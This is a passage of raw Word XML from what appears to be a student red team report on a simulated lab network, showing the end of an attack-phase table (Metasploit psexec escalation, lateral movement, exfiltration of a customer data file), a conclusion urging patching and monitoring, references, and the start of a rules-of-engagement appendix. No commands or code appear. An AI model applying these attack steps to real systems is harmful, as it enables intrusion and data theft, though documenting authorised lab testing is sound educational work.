          <w:p w14:paraId="1D10D233" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="295CA454" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Gaining higher privileges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6218EE06" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Attempted escalation using Metasploit (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>psexec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="45D138E5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C9DE3E7" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="503D0D07" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Moving within network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5129A5FA" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Accessed internal system from attacker machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="2BB37A80" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06807134" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Data Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08837A5D" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Extracting sensitive data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36F9E42E" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Downloaded customer data file from shared folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F6F4669" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AECEFAE" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc228059735"/>
      <w:bookmarkStart w:id="114" w:name="_Toc228127152"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8. Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
      <w:bookmarkEnd w:id="114"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB3AF44" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>This red team exercise illustrated an entire attack lifecycle in a simulated environment of ABCD Ltd, such as reconnaissance, exploitation, internal access, and data exfiltration. First was access via a vulnerable web service, then via the internal Windows system using credentials. Privilege escalation has failed, but sensitive data has been stolen, which points to major weaknesses in security. Among the issues that have been identified are unpatched services, minimal controls on authentication, and the absence of monitoring mechanisms(Kim and Solomon, 2018). These results reinforce the need to institute multi-level security policies, like patch management, effective authentication, and active monitoring, to minimise organisational vulnerability to cyber threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E57A15E" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52D64892" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01AAF670" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16BCE1A9" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6729C1FF" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="_Toc228059736"/>
      <w:bookmarkStart w:id="116" w:name="_Toc228127153"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w14:paraId="48044DEB" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve">MITRE, 2024. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK® Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve">. [online] Available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00BE46BA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve"> [Accessed 25 April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682E1AFE" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BCE6E52" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve">OWASP Foundation, 2021. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>OWASP Top 10: The Ten Most Critical Web Application Security Risks</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve">. [online] Available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00BE46BA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://owasp.org/www-project-top-ten/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve"> [Accessed 25 April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496B16C8" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C55CC13" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve">Scarfone, K. and Mell, P., 2017. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Guide to Intrusion Detection and Prevention Systems (IDPS)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>. NIST Special Publication 800-94. National Institute of Standards and Technology.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7282D170" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FA99C0B" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve">Behl, A. and Behl, K., 2017. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cybersecurity and Cyberwar: What Everyone Needs to Know</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>. Oxford: Oxford University Press.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D40A44" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="099ABC5B" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve">Kim, D. and Solomon, M.G., 2018. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Fundamentals of Information Systems Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>. 3rd ed. Burlington: Jones &amp; Bartlett Learning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1038A6E2" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6866EBF0" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve">Weidman, G., 2019. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Penetration Testing: A Hands-On Introduction to Hacking</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>. 2nd ed. San Francisco: No Starch Press.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F764D19" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08789C0A" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve">Nmap Project, 2023. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nmap Reference Guide</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve">. [online] Available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00BE46BA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://nmap.org/book/man.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve"> [Accessed 25 April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1606EAF3" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2270326A" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve">Rapid7, 2024. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Metasploit Framework Documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve">. [online] Available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00BE46BA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://docs.metasploit.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve"> [Accessed 25 April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454AC095" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FCAF72F" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve">Conti, M., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Dehghantanha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve">, A., Franke, K. and Watson, S., 2018. Cyber threat intelligence: challenges and opportunities. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>IEEE Cybersecurity Development</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>, 1(1), pp.1–6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0879A4DD" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB65D25" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve">Shackleford, D., 2020. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Security Information and Event Management (SIEM) Implementation Guide</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>. SANS Institute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18202A63" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2506D88E" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc228059737"/>
      <w:bookmarkStart w:id="118" w:name="_Toc228127154"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix A</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
      <w:bookmarkEnd w:id="118"/>
    </w:p>
    <w:p w14:paraId="12AE8918" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Appendix A: Rules of Engagement (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RoE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCE1876" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A1. Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198D504B" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>This Rules of Engagement (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>RoE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>) document defines the scope, constraints, and operational guidelines for the red team engagement conducted against the simulated environment of ABCD Ltd. The purpose of this document is to ensure that all testing activities are performed in a controlled, ethical, and authorised manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4E1686" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A2. Scope of Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C3053F" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The engagement was conducted within a controlled virtual lab environment consisting of the following systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAD1150" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kali Linux (Attacker Machine):</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve"> Used to simulate adversarial actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7DF239" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploitable2 (Web Server):</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve"> Represents the external-facing system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C2251D" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows 7 (Internal System):</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
